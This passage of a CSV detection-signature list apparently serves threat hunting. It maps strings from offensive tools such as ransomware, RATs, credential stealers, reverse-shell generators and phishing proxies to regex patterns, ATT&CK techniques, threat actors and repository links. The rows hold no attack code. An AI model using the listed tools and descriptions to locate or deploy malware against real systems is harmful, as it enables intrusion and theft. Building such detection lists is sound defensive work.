ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#mutex","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","3835" "*""Dump BH 
data""*",".{0,1000}\""Dump\sBH\sdata\"".{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","3836" "*""Evilginx Mastery Course""*",".{0,1000}\""Evilginx\sMastery\sCourse\"".{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","3837" "*""Generate reverse shell payloads.""*",".{0,1000}\""Generate\sreverse\sshell\spayloads\.\"".{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","3838" "*""Gh0st RAT Exception""*",".{0,1000}\""Gh0st\sRAT\sException\"".{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","#content","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","3839" "*""Granted user * DCSYNC 
rights!*",".{0,1000}\""Granted\suser\s.{0,1000}\sDCSYNC\srights!.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","3841" "*""GTUNNEL_HOST""*",".{0,1000}\""GTUNNEL_HOST\"".{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","3842" "*""GTUNNEL_PORT""*",".{0,1000}\""GTUNNEL_PORT\"".{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","3843" "*""HEHE YOU HAVE BEEN PWENED""*",".{0,1000}\""HEHE\sYOU\sHAVE\sBEEN\sPWENED\"".{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","3844" "*""https://api.ipify.org/?format=text"", ""https://myexternalip.com/raw"", ""https://wtfismyip.com/text"", ""https://icanhazip.com/"", 
""https://ip4.seeip.org""*",".{0,1000}\""https\:\/\/api\.ipify\.org\/\?format\=text\"",\s\""https\:\/\/myexternalip\.com\/raw\"",\s\""https\:\/\/wtfismyip\.com\/text\"",\s\""https\:\/\/icanhazip\.com\/\"",\s\""https\:\/\/ip4\.seeip\.org\"".{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","0","N/A","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","3846" "*""iN""+""voK""+""e""+""-""+""eXP""+""re""+""sSi""+""oN""*",".{0,1000}\""iN\""\+\""voK\""\+\""e\""\+\""\-\""\+\""eXP\""\+\""re\""\+\""sSi\""\+\""oN\"".{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","3847" "*""Injecting shellcode into PowerShell""*",".{0,1000}\""Injecting\sshellcode\sinto\sPowerShell\"".{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","3848" "*""IPPrint C2 Server""*",".{0,1000}\""IPPrint\sC2\sServer\"".{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - 
TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3849" "*""keylog.php""*",".{0,1000}\""keylog\.php\"".{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","N/A","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","3850" "*""localadmin123!""*",".{0,1000}\""localadmin123!\"".{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","3851" "*""Malware resources needs to be free and wide""*",".{0,1000}\""Malware\sresources\sneeds\sto\sbe\sfree\sand\swide\"".{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","3852" "*""MSGraph token is CAE capable""*",".{0,1000}\""MSGraph\stoken\sis\sCAE\scapable\"".{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential 
Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","3854" "*""My moto is to leave malware resources for free *",".{0,1000}\""My\smoto\sis\sto\sleave\smalware\sresources\sfor\sfree\s.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","3855" "*""N/A (Likely Pirated)""*",".{0,1000}\""N\/A\s\(Likely\sPirated\)\"".{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","3856" "*""NSA0XF$""*",".{0,1000}\""NSA0XF\$\"".{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","3857" "*""PAY ME MONEY""*",".{0,1000}\""PAY\sME\sMONEY\"".{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - 
T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","3859" "*""RANSOM_NOTE.txt""*",".{0,1000}\""RANSOM_NOTE\.txt\"".{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","3861" "*""RdpStrike.cna""*",".{0,1000}\""RdpStrike\.cna\"".{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","3862" "*""sacrificialO365Passwords"": *",".{0,1000}\""sacrificialO365Passwords\""\:\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3864" "*""sacrificialO365Username"": *",".{0,1000}\""sacrificialO365Username\""\:\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - 
TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3865" "*""samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913)*",".{0,1000}\""samaccounttype\=268435456\)\(samaccounttype\=268435457\)\(samaccounttype\=536870912\)\(samaccounttype\=536870913\).{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://thedfirreport.com/2024/08/26/blacksuit-ransomware/","1","0","N/A","N/A","N/A","7","N/A","N/A","N/A","N/A","3866" "*""Saved in session, but master password prevents plaintext recovery""*",".{0,1000}\""Saved\sin\ssession,\sbut\smaster\spassword\sprevents\splaintext\srecovery\"".{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. 
It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","0","#content","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","3867" "*""ServiceName = """"unstoppable""*",".{0,1000}\""ServiceName\s\=\s\""unstoppable\"".{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","#servicename","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","3868" "*""ServiceName=""""bypassit""*",".{0,1000}\""ServiceName\=\""bypassit\"".{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","3869" "*""small web shell by zaco*",".{0,1000}\""small\sweb\sshell\sby\szaco.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","3871" "*""Stardust MessageBox""*",".{0,1000}\""Stardust\sMessageBox\"".{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit 
position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","3872" "*""Starting Elevating to SYSTEM""*",".{0,1000}\""Starting\sElevating\sto\sSYSTEM\"".{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","N/A","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","3873" "*""Starting WD Disable""*",".{0,1000}\""Starting\sWD\sDisable\"".{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","N/A","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","3874" "*""Successful Connection PME""*",".{0,1000}\""Successful\sConnection\sPME\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3875" "*""The LaZagne project""*",".{0,1000}\""The\sLaZagne\sproject\"".{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#content","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","3876" "*""This is a macro obfuscating framework""*",".{0,1000}\""This\sis\sa\smacro\sobfuscating\sframework\"".{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3877" "*""UACBypassedService""*",".{0,1000}\""UACBypassedService\"".{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - 
T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","3878" "*""User32LogonProcesss""*",".{0,1000}User32LogonProcesss.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://x.com/_RastaMouse/status/1747636529613197757","1","0","N/A","typo in the process name used when calling LsaRegisterLogonProcess","10","10","N/A","N/A","N/A","N/A","3879" "*""VeeamBackupCreds""*",".{0,1000}\""VeeamBackupCreds\"".{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","3881" "*""WorkstationName"">RULER*",".{0,1000}\""WorkstationName\""\>RULER\<\/Data\>.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","3882" "*# @oldboy21*",".{0,1000}\#\s\s\@oldboy21.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - 
TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3883" "*# Add random newlines to the obfuscated code*",".{0,1000}\#\sAdd\srandom\snewlines\sto\sthe\sobfuscated\scode.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","3884" "*# Author: Dahvid Schloss a.k.a APT Big Daddy*",".{0,1000}\#\sAuthor\:\sDahvid\sSchloss\sa\.k\.a\sAPT\sBig\sDaddy.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","3886" "*# Author: Panagiotis Chartas (t3l3machus)*",".{0,1000}\#\sAuthor\:\sPanagiotis\sChartas\s\(t3l3machus\).{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","3887" "*# based on CVE-2019-0708*",".{0,1000}\#\sbased\son\sCVE\-2019\-0708.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","3888" "*# coded by PlayBit (c) *",".{0,1000}\#\scoded\sby\sPlayBit\s\(c\)\s.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","3889" "*# download virRu5*",".{0,1000}\#\sdownload\svirRu5.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","3890" "*# execute virRu5*",".{0,1000}\#\sexecute\svirRu5.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish 
a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","3891" "*# Find LOLBin and reconstruct commandline*",".{0,1000}\#\sFind\sLOLBin\sand\sreconstruct\scommandline.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","#content","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","3892" "*# Force Admin: Bypass Admin Privileges?*",".{0,1000}\#\sForce\sAdmin\:\sBypass\sAdmin\sPrivileges\?.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","3893" "*# If got a malicious packet - Activate the backdoor!*",".{0,1000}\#\sIf\sgot\sa\smalicious\spacket\s\-\sActivate\sthe\sbackdoor!.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","3894" "*# Inject: Inject payload into 
Discord?*",".{0,1000}\#\sInject\:\sInject\spayload\sinto\sDiscord\?.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","3895" "*# Injection URL: Raw URL to injection payload*",".{0,1000}\#\sInjection\sURL\:\sRaw\sURL\sto\sinjection\spayload.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","3896" "*# Majdi SaaD.exe*",".{0,1000}\#\sMajdi\sSaaD\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","3897" "*# Majdi 
SaaD.vshost.exe*",".{0,1000}\#\sMajdi\sSaaD\.vshost\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","3898" "*# Minimalistic AD login bruteforcer *",".{0,1000}\#\sMinimalistic\sAD\slogin\sbruteforcer\s.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","3899" "*# Minimalistic SMB login bruteforcer *",".{0,1000}\#\sMinimalistic\sSMB\slogin\sbruteforcer\s.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential 